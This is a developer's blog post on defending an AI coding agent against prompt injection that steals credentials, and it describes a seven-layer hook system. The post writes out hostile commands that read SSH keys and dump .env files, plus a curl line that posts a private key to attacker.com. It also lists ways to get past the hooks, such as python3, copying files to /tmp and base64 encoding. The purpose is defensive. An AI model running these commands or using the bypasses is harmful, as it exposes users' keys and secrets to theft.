Your AI Coding Agent Has Access to Your SSH Keys Right Now

I use Claude Code to build ConnectEngine OS every day. It reads files, writes code, deploys to servers, manages n8n workflows. It's the most productive tool I've ever used.

Yesterday I read a post by Slava Spitsyn that made me audit my entire setup. His point was simple: a prompt injection from any webpage your AI reads could steal your credentials. Not theoretically. The permission path was open.

I checked mine. Bash was auto-allowed. Every bash command ran without confirmation. Three SSH private keys, six .env files with API keys, Supabase service role tokens. All readable. All exfiltrable with a single curl.

The Real Attack Surface

When you give Claude Code bash access, you're not just letting it run commands. You're giving it the same privileges you have. That includes:

• cat ~/.ssh/id_rsa reads your private keys
• find . -name "*.env" -exec cat {} \; dumps all environment files
• curl -X POST https://attacker.com -d "$(cat ~/.ssh/id_rsa)" exfiltrates everything

The prompt injection vector is real. Any website Claude reads, any document it processes, any code it reviews could contain hidden instructions. The AI doesn't distinguish between your request and malicious content it encounters.

My 7-Layer Defense System

I built a security system with multiple overlapping protections. Each layer catches what the others miss:

Layer 1: Pre-execution Hooks

Bash hooks that block credential access before any command runs:

if [[ "$cmd" =~ (\.env|\.ssh|id_rsa|config.*database) ]]; then
    echo "BLOCKED: Credential access denied"
    exit 1
fi

Layer 2: Bypass Detection

During testing, I found gaps. Pipes bypass simple pattern matching. python3 bypasses every grep-based hook. cp bypasses read guards completely. The detection system catches these:

# Catches: cat file.env | base64
# Catches: python3 -c "print(open('.env').read())"
# Catches: cp .env /tmp/x && cat /tmp/x

Layer 3: Canary Counter-Injection

A fake credentials file that counter-injects if accessed. If Claude tries to read ~/.env_fake, the system detects the breach and blocks all subsequent operations.

Layer 4: Self-Modification Guard

Prevents the AI from disabling its own security by editing hook files or changing permissions on the guard system.

Layers 5-7: Monitoring, Logging, and Network Isolation

File access logs, network request monitoring, and restricted outbound connections for sensitive operations.

What I Learned Testing This

The attack vectors are more subtle than obvious credential grabs. Real prompt injections would:

• Use Python to bypass bash pattern matching
• Copy sensitive files to /tmp first, then read them
• Base64 encode outputs to hide obvious data exfiltration
• Use environment variable expansion to obfuscate commands

Simple deny lists catch amateur hour attacks. Sophisticated ones require layered detection.

The Productivity vs Security Balance

100% safety means no terminal access. That kills the productivity that makes AI coding agents valuable. The goal is making casual prompt injections fail and obvious exfiltration attempts get caught.

I still use Claude Code daily. My n8n-based AI agent follows similar security patterns. The difference is I now run it inside a container with explicit guards instead of trusting the AI to behave.

This connects to broader themes around AI agent infrastructure and how we secure systems that operate autonomously. Even AI-powered search optimization tools need similar protections when they access your content management systems.

Audit your setup. Check what your AI coding agent can actually access. The productivity gains are real, but so are the risks.

Credit to Slava Spitsyn for raising this issue publicly. His security hooks repository covers the technical implementation details.

Need help securing your AI automation setup? Start with a free website audit to identify potential vulnerabilities.